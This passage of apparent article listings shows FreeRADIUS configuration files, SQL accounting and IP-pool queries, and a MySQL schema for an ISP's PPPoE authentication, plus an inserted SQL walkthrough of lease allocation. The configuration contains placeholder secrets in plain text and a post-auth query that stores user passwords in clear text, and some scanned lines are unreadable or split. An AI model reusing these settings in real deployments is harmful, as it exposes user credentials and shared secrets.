file = ${logdir}/radius.log
syslog_facility = daemon
stripped_names = no
auth = yes
auth_badpass = yes
auth_goodpass = no
}
checkrad = ${sbindir}/checkrad
security {
max_attributes = 200
reject_delay = 1
status_server = yes
}
proxy_requests = yes
$INCLUDE proxy.conf
$INCLUDE clients.conf
thread pool {
start_servers = [unreadable in the scan]
max_servers = 32
min_spare_servers = [unreadable in the scan]
max_spare_servers = 10
max_requests_per_server = 0
}
modules {
$INCLUDE ${confdir}/modules/
$INCLUDE eap.conf
$INCLUDE sql.conf
$INCLUDE sqlippool.conf
}
instantiate {
exec
expr
expiration
logintime
}
$INCLUDE policy.conf
$INCLUDE sites-enabled/
#eof

# vi /usr/local/etc/raddb/sqlippool.conf
sqlippool {
sql-instance-name = "sql"
ippool_table = "radippool"
lease-duration = 360
pool-key = "%{NAS-Port}"
$INCLUDE sql/mysql/ippool.conf
sqlippool_log_exists = "Existing IP: %{reply:Framed-IP-Address} (did %{Called-Station-Id} cli %{Calling-Station-Id} port %{NAS-Port} user %{User-Name})"
sqlippool_log_success = "Allocated IP: %{reply:Framed-IP-Address} from %{control:Pool-Name} (did %{Called-Station-Id} cli %{Calling-Station-Id} port %{NAS-Port} user %{User-Name})"
sqlippool_log_clear = "Released IP %{Framed-IP-Address} (did %{Called-Station-Id} cli %{Calling-Station-Id} user %{User-Name})"
sqlippool_log_failed = "IP Allocation FAILED from %{control:Pool-Name} (did %{Called-Station-Id} cli %{Calling-Station-Id} port %{NAS-Port} user %{User-Name})"
sqlippool_log_nopool = "No Pool-Name defined (did %{Called-Station-Id} cli %{Calling-Station-Id} port %{NAS-Port} user %{User-Name})"
}
#eof

# vi /usr/local/etc/raddb/sql.conf
sql {
database = "mysql"
driver = "rlm_sql_${database}"
server = "localhost"
login = "userradius"
password = "senharadius"
radius_db = "radius"
acct_table1 = "radacct"
acct_table2 = "radacct"
postauth_table = "radpostauth"
authcheck_table = "radcheck"
authreply_table = "radreply"
groupcheck_table = "radgroupcheck"
groupreply_table = "radgroupreply"
usergroup_table = "radusergroup"
read_groups = yes
deletestalesessions = yes
sqltrace = no
sqltracefile = ${logdir}/sqltrace.sql
num_sql_socks = 30
connect_failure_retry_delay = 60
lifetime = 0
max_queries = 0
nas_table = "nas"
$INCLUDE sql/${database}/dialup.conf
}
#eof

# vi /usr/local/etc/raddb/eap.conf
eap {
default_eap_type = md5
timer_expire = 60
ignore_unknown_eap_types = no
cisco_accounting_username_bug = no
max_sessions = 4096
md5 {
}
leap {
}
gtc {
auth_type = PAP
}
tls {
certdir = ${confdir}/certs
cadir = ${confdir}/certs
private_key_password = whatever
private_key_file = ${certdir}/server.pem
certificate_file = ${certdir}/server.pem
CA_file = ${cadir}/ca.pem
dh_file = ${certdir}/dh
random_file = ${certdir}/random
CA_path = ${cadir}
cipher_list = "DEFAULT"
make_cert_command = "${certdir}/bootstrap"
cache {
enable = no
lifetime = 24 # hours
max_entries = 255
}
verify {
}
}
ttls {
default_eap_type = md5
copy_request_to_tunnel = no
use_tunneled_reply = no
virtual_server = "inner-tunnel"
}
peap {
default_eap_type = mschapv2
copy_request_to_tunnel = no
use_tunneled_reply = no
virtual_server = "inner-tunnel"
}
mschapv2 {
}
}
#eof


# vi /usr/local/etc/raddb/proxy.conf
proxy server {
    default_fallback = no
}

home_server localhost {
    type = auth
    ipaddr = 127.0.0.1
    port = 1812
    secret = testing123
    require_message_authenticator = yes
    response_window = 20
    zombie_period = 40
    revive_interval = 120
    status_check = status-server
    check_interval = 30
    num_answers_to_alive = 3
    coa {
        irt = 2
        mrt = 16
        mrc = 5
        mrd = 30
    }
}

home_server_pool my_auth_failover {
    type = fail-over
    home_server = localhost
}

realm example.com {
    auth_pool = my_auth_failover
}

realm LOCAL {
}
#eof


# vi /usr/local/etc/raddb/policy.conf
policy {
    forbid_eap {
        if (EAP-Message) {
            reject
        }
    }
    permit_only_eap {
        if (!EAP-Message) {
            if (!"%{outer.request:EAP-Message}") {
                reject
            }
        }
    }
    deny_realms {
        if (User-Name =~ /@|\\/) {
            reject
        }
    }
    do_not_respond {
        update control {
            Response-Packet-Type := Do-Not-Respond
        }
        handled
    }
    cui_authorize {
        update request {
            Chargeable-User-Identity:='\\000'
        }
    }
    cui_postauth {
        if (FreeRadius-Proxied-To == 127.0.0.1) {
            if (outer.request:Chargeable-User-Identity) {
                update outer.reply {
                    Chargeable-User-Identity:="%{md5:%{config:cui_hash_key}%{User-Name}}"
                }
            }
        }
        else {
            if (Chargeable-User-Identity) {
                update reply {
                    Chargeable-User-Identity:="%{md5:%{config:cui_hash_key}%{User-Name}}"
                }
            }
        }
    }
    cui_updatedb {
        if (reply:Chargeable-User-Identity) {
            cui
        }
    }
    cui_accounting {
        if (!Chargeable-User-Identity) {
            update control {
                Chargable-User-Identity := "%{cui: SELECT cui FROM cui WHERE clientipaddress = '%{Client-IP-Address}' AND callingstationid = '%{Calling-Station-Id}' AND username = '%{User-Name}'}"
            }
        }
        if (Chargeable-User-Identity && (Chargeable-User-Identity != "")) {
            cui
        }
    }
}
#eof

# vi /usr/local/etc/raddb/sql/mysql/ippool.conf
allocate-clear = "UPDATE ${ippool_table} \
    SET nasipaddress = '', pool_key = 0, \
    callingstationid = '', username = '', \
    expiry_time = NULL \
    WHERE expiry_time <= NOW() - INTERVAL 1 SECOND \
    AND nasipaddress = '%{Nas-IP-Address}'"

allocate-find = "SELECT framedipaddress FROM ${ippool_table} \
    WHERE pool_name = '%{control:Pool-Name}' \
    ORDER BY (username <> '%{User-Name}'), \
    (callingstationid <> '%{Calling-Station-Id}'), \
    expiry_time \
    LIMIT 1 \
    FOR UPDATE"

pool-check = "SELECT id FROM ${ippool_table} \
    WHERE pool_name='%{control:Pool-Name}' LIMIT 1"

allocate-update = "UPDATE ${ippool_table} \
    SET nasipaddress = '%{NAS-IP-Address}', pool_key = '${pool-key}', \
    callingstationid = '%{Calling-Station-Id}', username = '%{User-Name}', \
    expiry_time = NOW() + INTERVAL ${lease-duration} SECOND \
    WHERE framedipaddress = '%I' AND expiry_time IS NULL"

start-update = "UPDATE ${ippool_table} \
    SET expiry_time = NOW() + INTERVAL ${lease-duration} SECOND \
    WHERE nasipaddress = '%{NAS-IP-Address}' AND pool_key = '${pool-key}' \
    AND username = '%{User-Name}' \
    AND callingstationid = '%{Calling-Station-Id}' \
    AND framedipaddress = '%{Framed-IP-Address}'"

stop-clear = "UPDATE ${ippool_table} \
    SET nasipaddress = '', pool_key = 0, callingstationid = '', \
    username = '', \
    expiry_time = NULL \
    WHERE nasipaddress = '%{Nas-IP-Address}' AND pool_key = '${pool-key}' \
    AND username = '%{User-Name}' \
    AND callingstationid = '%{Calling-Station-Id}' \
    AND framedipaddress = '%{Framed-IP-Address}'"

alive-update = "UPDATE ${ippool_table} \
    SET expiry_time = NOW() + INTERVAL ${lease-duration} SECOND \
    WHERE nasipaddress = '%{Nas-IP-Address}' AND pool_key = '${pool-key}' \
    AND username = '%{User-Name}' \
    AND callingstationid = '%{Calling-Station-Id}' \
    AND framedipaddress = '%{Framed-IP-Address}'"

on-clear = "UPDATE ${ippool_table} \
    SET nasipaddress = '', pool_key = 0, callingstationid = '', \
    username = '', \
    expiry_time = NULL \
    WHERE nasipaddress = '%{Nas-IP-Address}'"

off-clear = "UPDATE ${ippool_table} \
    SET nasipaddress = '', pool_key = 0, callingstationid = '', \
    username = '', \
    expiry_time = NULL \
    WHERE nasipaddress = '%{Nas-IP-Address}'"
#eof
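The lease lifecycle those ippool.conf queries implement, as an added example that is not part of the article: the same statements with the %{...} expansions replaced by literal values for one PPPoE session, so they can be run by hand in the mysql client against the radippool table from Listing 9. It assumes lease-duration = 360 and pool-key = %{NAS-Port} from sqlippool.conf; the pool addresses, the NAS address 198.51.100.5, the port numbers, user names and calling-station-ids are constructed sample values.

```sql
-- Added example (not from the article): walking one session through the
-- sqlippool queries of sql/mysql/ippool.conf with literal values.
-- Assumes the radippool table from Listing 9 (MySQL/InnoDB), lease-duration = 360
-- and pool-key = %{NAS-Port}.  All addresses, ports and names below are constructed.

-- A small pool: two free rows and one whose lease ran out an hour ago.
INSERT INTO radippool (pool_name, framedipaddress, nasipaddress, calledstationid,
                       callingstationid, expiry_time, username, pool_key)
VALUES ('main_pool', '203.0.113.26', '', '', NULL, NULL, '', '0'),
       ('main_pool', '203.0.113.27', '', '', NULL, NULL, '', '0'),
       ('main_pool', '203.0.113.28', '198.51.100.5', '', '00:11:22:33:44:55',
        NOW() - INTERVAL 1 HOUR, 'olduser', '7');

-- 1. allocate-clear, run on each Access-Request for this NAS: release every row
--    whose lease has expired (this is what makes 203.0.113.28 free again).
UPDATE radippool
   SET nasipaddress = '', pool_key = 0, callingstationid = '', username = '',
       expiry_time = NULL
 WHERE expiry_time <= NOW() - INTERVAL 1 SECOND
   AND nasipaddress = '198.51.100.5';

-- 2. allocate-find: pick a candidate for testuser, NAS-Port 3, caller aa:bb:cc:dd:ee:ff.
--    The listing's query has no WHERE on expiry_time; it relies on the ORDER BY:
--    rows that belonged to the same user, then the same caller, then by expiry_time,
--    where MySQL sorts NULL (free) first.  FOR UPDATE locks the chosen row, so steps
--    2 and 3 must run inside one transaction or two concurrent requests can be
--    handed the same address.
START TRANSACTION;
SELECT framedipaddress
  FROM radippool
 WHERE pool_name = 'main_pool'
 ORDER BY (username <> 'testuser'), (callingstationid <> 'aa:bb:cc:dd:ee:ff'), expiry_time
 LIMIT 1
 FOR UPDATE;
-- expected: 203.0.113.26 (no previous binding for this user or caller, lowest free row)

-- 3. allocate-update: bind the address the SELECT returned (%I in the listing).
--    The expiry_time IS NULL condition is the last guard against rebinding a row
--    that still carries a live lease.
UPDATE radippool
   SET nasipaddress = '198.51.100.5', pool_key = '3',
       callingstationid = 'aa:bb:cc:dd:ee:ff', username = 'testuser',
       expiry_time = NOW() + INTERVAL 360 SECOND
 WHERE framedipaddress = '203.0.113.26' AND expiry_time IS NULL;
COMMIT;

-- start-update / alive-update (Accounting-Start and Interim-Update) only push the
-- lease forward; with lease-duration = 360 the NAS must send interim updates more
-- often than every six minutes or allocate-clear will reclaim a live address.
UPDATE radippool
   SET expiry_time = NOW() + INTERVAL 360 SECOND
 WHERE nasipaddress = '198.51.100.5' AND pool_key = '3'
   AND username = 'testuser' AND callingstationid = 'aa:bb:cc:dd:ee:ff'
   AND framedipaddress = '203.0.113.26';

-- stop-clear (Accounting-Stop): release the row only if every binding field matches,
-- so a stale Stop for an earlier session cannot free an address now used by someone else.
UPDATE radippool
   SET nasipaddress = '', pool_key = 0, callingstationid = '', username = '',
       expiry_time = NULL
 WHERE nasipaddress = '198.51.100.5' AND pool_key = '3'
   AND username = 'testuser' AND callingstationid = 'aa:bb:cc:dd:ee:ff'
   AND framedipaddress = '203.0.113.26';

-- Sanity check: nothing should be bound to this NAS and port any more.
SELECT framedipaddress, username, expiry_time
  FROM radippool
 WHERE nasipaddress = '198.51.100.5' AND pool_key = '3';
```

The point to take from the transaction is that the server's sqlippool module does exactly this around allocate-find and allocate-update; if you change the queries, keep the FOR UPDATE and the expiry_time IS NULL guard, and size lease-duration against the interim-update interval configured on the concentrator.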
# vi /usr/local/etc/raddb/sql/mysql/dialup.conf
sql_user_name = "%{User-Name}"

nas_query = "SELECT id, nasname, shortname, type, secret, server FROM ${nas_table}"

authorize_check_query = "SELECT id, username, attribute, value, op \
    FROM ${authcheck_table} \
    WHERE username = '%{SQL-User-Name}' \
    ORDER BY id"

authorize_reply_query = "SELECT id, username, attribute, value, op \
    FROM ${authreply_table} \
    WHERE username = '%{SQL-User-Name}' AND attribute <> 'Garantia' \
    ORDER BY id"

group_membership_query = "SELECT trim(groupname) as groupname \
    FROM ${usergroup_table} \
    WHERE username = '%{SQL-User-Name}' \
    ORDER BY priority"

authorize_group_check_query = "SELECT id, trim(groupname) as groupname, attribute, \
    value, op \
    FROM ${groupcheck_table} \
    WHERE trim(groupname) = trim('%{Sql-Group}') \
    ORDER BY id"

authorize_group_reply_query = "SELECT id, trim(groupname) as groupname, attribute, \
    value, op \
    FROM ${groupreply_table} \
    WHERE trim(groupname) = trim('%{Sql-Group}') AND attribute <> 'Garantia' \
    ORDER BY id"

accounting_onoff_query = "\
    UPDATE ${acct_table1} \
    SET \
        acctstoptime = '%S', \
        acctsessiontime = unix_timestamp('%S') - \
            unix_timestamp(acctstarttime), \
        acctterminatecause = '%{Acct-Terminate-Cause}', \
        acctstopdelay = %{%{Acct-Delay-Time}:-0} \
    WHERE acctstoptime IS NULL \
    AND nasipaddress = '%{NAS-IP-Address}' \
    AND acctstarttime <= '%S'"

accounting_update_query = " \
    UPDATE ${acct_table1} \
    SET \
        framedipaddress = '%{Framed-IP-Address}', \
        acctsessiontime = '%{Acct-Session-Time}', \
        acctinputoctets = '%{%{Acct-Input-Gigawords}:-0}' << 32 | \
            '%{%{Acct-Input-Octets}:-0}', \
        acctoutputoctets = '%{%{Acct-Output-Gigawords}:-0}' << 32 | \
            '%{%{Acct-Output-Octets}:-0}' \
    WHERE acctsessionid = '%{Acct-Session-Id}' \
    AND username = '%{SQL-User-Name}' \
    AND nasipaddress = '%{NAS-IP-Address}'"

accounting_update_query_alt = " \
    INSERT INTO ${acct_table1} \
        (acctsessionid, acctuniqueid, username, \
        realm, nasipaddress, nasportid, \
        nasporttype, acctstarttime, acctsessiontime, \
        acctauthentic, connectinfo_start, acctinputoctets, \
        acctoutputoctets, calledstationid, callingstationid, \
        servicetype, framedprotocol, framedipaddress, \
        acctstartdelay, xascendsessionsvrkey) \
    VALUES \
        ('%{Acct-Session-Id}', '%{Acct-Unique-Session-Id}', \
        '%{SQL-User-Name}', \
        '%{Realm}', '%{NAS-IP-Address}', '%{NAS-Port}', \
        '%{NAS-Port-Type}', \
        DATE_SUB('%S', \
            INTERVAL (%{%{Acct-Session-Time}:-0} + \
            %{%{Acct-Delay-Time}:-0}) SECOND), \
        '%{Acct-Session-Time}', \
        '%{Acct-Authentic}', '', \
        '%{%{Acct-Input-Gigawords}:-0}' << 32 | \
        '%{%{Acct-Input-Octets}:-0}', \
        '%{%{Acct-Output-Gigawords}:-0}' << 32 | \
        '%{%{Acct-Output-Octets}:-0}', \
        '%{Called-Station-Id}', '%{Calling-Station-Id}', \
        '%{Service-Type}', '%{Framed-Protocol}', \
        '%{Framed-IP-Address}', \
        '0', '%{X-Ascend-Session-Svr-Key}')"

accounting_start_query = " \
    INSERT INTO ${acct_table1} \
        (acctsessionid, acctuniqueid, username, \
        realm, nasipaddress, nasportid, \
        nasporttype, acctstarttime, acctstoptime, \
        acctsessiontime, acctauthentic, connectinfo_start, \
        connectinfo_stop, acctinputoctets, acctoutputoctets, \
        calledstationid, callingstationid, acctterminatecause, \
        servicetype, framedprotocol, framedipaddress, \
        acctstartdelay, acctstopdelay, xascendsessionsvrkey) \
    VALUES \
        ('%{Acct-Session-Id}', '%{Acct-Unique-Session-Id}', \
        '%{SQL-User-Name}', \
        '%{Realm}', '%{NAS-IP-Address}', '%{NAS-Port}', \
        '%{NAS-Port-Type}', '%S', NULL, \
        '0', '%{Acct-Authentic}', '%{Connect-Info}', \
        '', '0', '0', \
        '%{Called-Station-Id}', '%{Calling-Station-Id}', '', \
        '%{Service-Type}', '%{Framed-Protocol}', '%{Framed-IP-Address}', \
        '%{%{Acct-Delay-Time}:-0}', '0', '%{X-Ascend-Session-Svr-Key}')"

accounting_start_query_alt = " \
    UPDATE ${acct_table1} SET \
        acctstarttime = '%S', \
        acctstartdelay = '%{%{Acct-Delay-Time}:-0}', \
        connectinfo_start = '%{Connect-Info}' \
    WHERE acctsessionid = '%{Acct-Session-Id}' \
    AND username = '%{SQL-User-Name}' \
    AND nasipaddress = '%{NAS-IP-Address}'"

accounting_stop_query = " \
    UPDATE ${acct_table2} SET \
        acctstoptime = '%S', \
        acctsessiontime = '%{Acct-Session-Time}', \
        acctinputoctets = '%{%{Acct-Input-Gigawords}:-0}' << 32 | \
            '%{%{Acct-Input-Octets}:-0}', \
        acctoutputoctets = '%{%{Acct-Output-Gigawords}:-0}' << 32 | \
            '%{%{Acct-Output-Octets}:-0}', \
        acctterminatecause = '%{Acct-Terminate-Cause}', \
        acctstopdelay = '%{%{Acct-Delay-Time}:-0}', \
        connectinfo_stop = '%{Connect-Info}' \
    WHERE acctsessionid = '%{Acct-Session-Id}' \
    AND username = '%{SQL-User-Name}' \
    AND nasipaddress = '%{NAS-IP-Address}'"

accounting_stop_query_alt = " \
    INSERT INTO ${acct_table2} \
        (acctsessionid, acctuniqueid, username, \
        realm, nasipaddress, nasportid, \
        nasporttype, acctstarttime, acctstoptime, \
        acctsessiontime, acctauthentic, connectinfo_start, \
        connectinfo_stop, acctinputoctets, acctoutputoctets, \
        calledstationid, callingstationid, acctterminatecause, \
        servicetype, framedprotocol, framedipaddress, \
        acctstartdelay, acctstopdelay) \
    VALUES \
        ('%{Acct-Session-Id}', '%{Acct-Unique-Session-Id}', \
        '%{SQL-User-Name}', \
        '%{Realm}', '%{NAS-IP-Address}', '%{NAS-Port}', \
        '%{NAS-Port-Type}', \
        DATE_SUB('%S', \
            INTERVAL (%{%{Acct-Session-Time}:-0} + \
            %{%{Acct-Delay-Time}:-0}) SECOND), \
        '%S', '%{Acct-Session-Time}', '%{Acct-Authentic}', '', \
        '%{Connect-Info}', \
        '%{%{Acct-Input-Gigawords}:-0}' << 32 | \
        '%{%{Acct-Input-Octets}:-0}', \
        '%{%{Acct-Output-Gigawords}:-0}' << 32 | \
        '%{%{Acct-Output-Octets}:-0}', \
        '%{Called-Station-Id}', '%{Calling-Station-Id}', \
        '%{Acct-Terminate-Cause}', \
        '%{Service-Type}', '%{Framed-Protocol}', '%{Framed-IP-Address}', \
        '0', '%{%{Acct-Delay-Time}:-0}')"

simul_count_query = "SELECT COUNT(*) \
    FROM ${acct_table1} \
    WHERE username = '%{SQL-User-Name}' \
    AND acctstoptime IS NULL"

simul_verify_query = "SELECT radacctid, acctsessionid, username, \
    nasipaddress, nasportid, framedipaddress, \
    callingstationid, framedprotocol \
    FROM ${acct_table1} \
    WHERE username = '%{SQL-User-Name}' \
    AND acctstoptime IS NULL"

postauth_query = "INSERT INTO ${postauth_table} \
    (username, pass, reply, authdate) \
    VALUES ( \
    '%{User-Name}', \
    '%{%{User-Password}:-%{Chap-Password}}', \
    '%{reply:Packet-Type}', '%S')"
#eof


# /usr/local/etc/raddb/sites-enabled/control-socket
listen {
    type = control
    socket = ${run_dir}/${name}.sock
}
#eof

# /usr/local/etc/raddb/sites-enabled/inner-tunnel
server inner-tunnel {
    listen {
        ipaddr = 127.0.0.1
        port = 18120
        type = auth
    }
    authorize {
        chap
        mschap
        suffix
        update control {
            Proxy-To-Realm := LOCAL
        }
        eap {
            ok = return
        }
        files
        expiration
        logintime
        pap
    }
    authenticate {
        Auth-Type PAP {
            pap
        }
        Auth-Type CHAP {
            chap
        }
        Auth-Type MS-CHAP {
            mschap
        }
        unix
        eap
    }
    session {
        radutmp
    }
    post-auth {
        Post-Auth-Type REJECT {
            attr_filter.access_reject
        }
    }
    pre-proxy {
    }
    post-proxy {
        eap
    }
}
#eof

# /usr/local/etc/raddb/sites-enabled/default
authorize {
    preprocess
    chap
    mschap
    sql
    expiration
    logintime
    pap
    eap
}
authenticate {
    Auth-Type PAP {
        pap
    }
    Auth-Type CHAP {
        chap
    }
    Auth-Type MS-CHAP {
        mschap
    }
    digest
}
preacct {
    preprocess
    acct_unique
    suffix
    files
}
accounting {
    detail
    sql
    exec
    attr_filter.accounting_response
    sqlippool
}
session {
    sql
}
post-auth {
    exec
    Post-Auth-Type REJECT {
        attr_filter.access_reject
    }
    sqlippool
}
pre-proxy {
}
post-proxy {
}
#eof
Listing 9.

# cat radius_nodata.sql

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `nas`
--

DROP TABLE IF EXISTS `nas`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `nas` (
  `id` int(10) NOT NULL AUTO_INCREMENT,
  `nasname` varchar(128) NOT NULL,
  `shortname` varchar(32) DEFAULT NULL,
  `type` varchar(30) DEFAULT 'other',
  `ports` int(5) DEFAULT NULL,
  `secret` varchar(60) NOT NULL DEFAULT 'secret',
  `community` varchar(50) DEFAULT NULL,
  `description` varchar(200) DEFAULT 'RADIUS Client',
  PRIMARY KEY (`id`),
  KEY `nasname` (`nasname`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Table structure for table `radacct`
--

DROP TABLE IF EXISTS `radacct`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `radacct` (
  `RadAcctId` bigint(21) NOT NULL AUTO_INCREMENT,
  `AcctSessionId` varchar(32) NOT NULL DEFAULT '',
  `AcctUniqueId` varchar(32) NOT NULL DEFAULT '',
  `UserName` varchar(64) NOT NULL DEFAULT '',
  `Realm` varchar(64) DEFAULT '',
  `NASIPAddress` varchar(15) NOT NULL DEFAULT '',
  `NASPortId` varchar(15) DEFAULT NULL,
  `NASPortType` varchar(32) DEFAULT NULL,
  `AcctStartTime` datetime N
OT NULL DEFAULT '0000-00-00 00:00:00',
  `AcctStopTime` datetime DEFAULT NULL,
  `AcctSessionTime` int(12) DEFAULT NULL,
  `AcctAuthentic` varchar(32) DEFAULT NULL,
  `ConnectInfo_start` varchar(50) DEFAULT NULL,
  `ConnectInfo_stop` varchar(50) DEFAULT NULL,
  `AcctInputOctets` bigint(12) DEFAULT NULL,
  `AcctOutputOctets` bigint(12) DEFAULT NULL,
  `CalledStationId` varchar(50) NOT NULL DEFAULT '',
  `CallingStationId` varchar(50) NOT NULL DEFAULT '',
  `AcctTerminateCause` varchar(32) NOT NULL DEFAULT '',
  `ServiceType` varchar(32) DEFAULT NULL,
  `FramedProtocol` varchar(32) DEFAULT NULL,
  `FramedIPAddress` varchar(15) NOT NULL DEFAULT '',
  `AcctStartDelay` int(12) DEFAULT NULL,
  `AcctStopDelay` int(12) DEFAULT NULL,
  `xascendsessionsvrkey` varchar(10) DEFAULT NULL,
  PRIMARY KEY (`RadAcctId`),
  KEY `UserName` (`UserName`),
  KEY `FramedIPAddress` (`FramedIPAddress`),
  KEY `AcctSessionId` (`AcctSessionId`),
  KEY `AcctUniqueId` (`AcctUniqueId`),
  KEY `AcctStartTime` (`AcctStartTime`),
  KEY `AcctStopTime` (`AcctStopTime`),
  KEY `NASIPAddress` (`NASIPAddress`)
) ENGINE=InnoDB AUTO_INCREMENT=22301255 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Table structure for table `radcheck`
--

DROP TABLE IF EXISTS `radcheck`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `radcheck` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `UserName` varchar(64) NOT NULL DEFAULT '',
  `Attribute` varchar(32) NOT NULL DEFAULT '',
  `op` char(2) NOT NULL DEFAULT '==',
  `Value` varchar(253) NOT NULL DEFAULT '',
  `Bloqueado` tinyint(1) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `UserName` (`UserName`(32))
) ENGINE=MyISAM AUTO_INCREMENT=20876 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Table structure for table `radgroupcheck`
--

DROP TABLE IF EXISTS `radgroupcheck`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `radgroupcheck` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `GroupName` varchar(64) NOT NULL DEFAULT '',
  `Attribute` varchar(32) NOT NULL DEFAULT '',
  `op` char(2) NOT NULL DEFAULT '==',
  `Value` varchar(253) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `GroupName` (`GroupName`(32))
) ENGINE=MyISAM AUTO_INCREMENT=250 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Table structure for table `radgroupreply`
--

DROP TABLE IF EXISTS `radgroupreply`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `radgroupreply` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `GroupName` varchar(64) NOT NULL DEFAULT '',
  `Attribute` varchar(32) NOT NULL DEFAULT '',
  `op` char(2) NOT NULL DEFAULT '=',
  `Value` varchar(253) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `GroupName` (`GroupName`(32))
) ENGINE=MyISAM AUTO_INCREMENT=492 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Table structure for table `radippool`
--

DROP TABLE IF EXISTS `radippool`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `radippool` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `pool_name` varchar(30) NOT NULL,
  `framedipaddress` varchar(15) NOT NULL DEFAULT '',
  `nasipaddress` varchar(15) NOT NULL DEFAULT '',
  `calledstationid` varchar(30) NOT NULL,
  `callingstationid` varchar(60) DEFAULT NULL,
  `expiry_time` datetime DEFAULT NULL,
  `username` varchar(64) NOT NULL DEFAULT '',
  `pool_key` varchar(30) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `radippool_poolname_expire` (`pool_name`,`expiry_time`),
  KEY `framedipaddress` (`framedipaddress`),
  KEY `radippool_nasip_poolkey_ipaddress` (`nasipaddress`,`pool_key`,`framedipaddress`)
) ENGINE=InnoDB AUTO_INCREMENT=994 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Table structure for table `radpostauth`
--

DROP TABLE IF EXISTS `radpostauth`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `radpostauth` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `user` varchar(64) NOT NULL DEFAULT '',
  `pass` varchar(64) NOT NULL DEFAULT '',
  `reply` varchar(32) NOT NULL DEFAULT '',
  `date` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=5673695 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Table structure for table `radreply`
--

DROP TABLE IF EXISTS `radreply`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `radreply` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `UserName` varchar(64) NOT NULL DEFAULT '',
  `Attribute` varchar(32) NOT NULL DEFAULT '',
  `op` char(2) NOT NULL DEFAULT '=',
  `Value` varchar(253) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `UserName` (`UserName`(32))
) ENGINE=MyISAM AUTO_INCREMENT=27136 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Table structure for table `usergroup`
--

DROP TABLE IF EXISTS `usergroup`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `usergroup` (
  `UserName` varchar(64) NOT NULL DEFAULT '',
  `GroupName` varchar(64) NOT NULL DEFAULT '',
  `priority` int(11) NOT NULL DEFAULT '1',
  KEY `UserName` (`UserName`(32))
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Table structure for table `velocidades`
--

DROP TABLE IF EXISTS `velocidades`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `velocidades` (
  `id` int(11) NOT NULL,
  `vdown` int(11) NOT NULL,
  `vup` int(11) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
Listing 10.

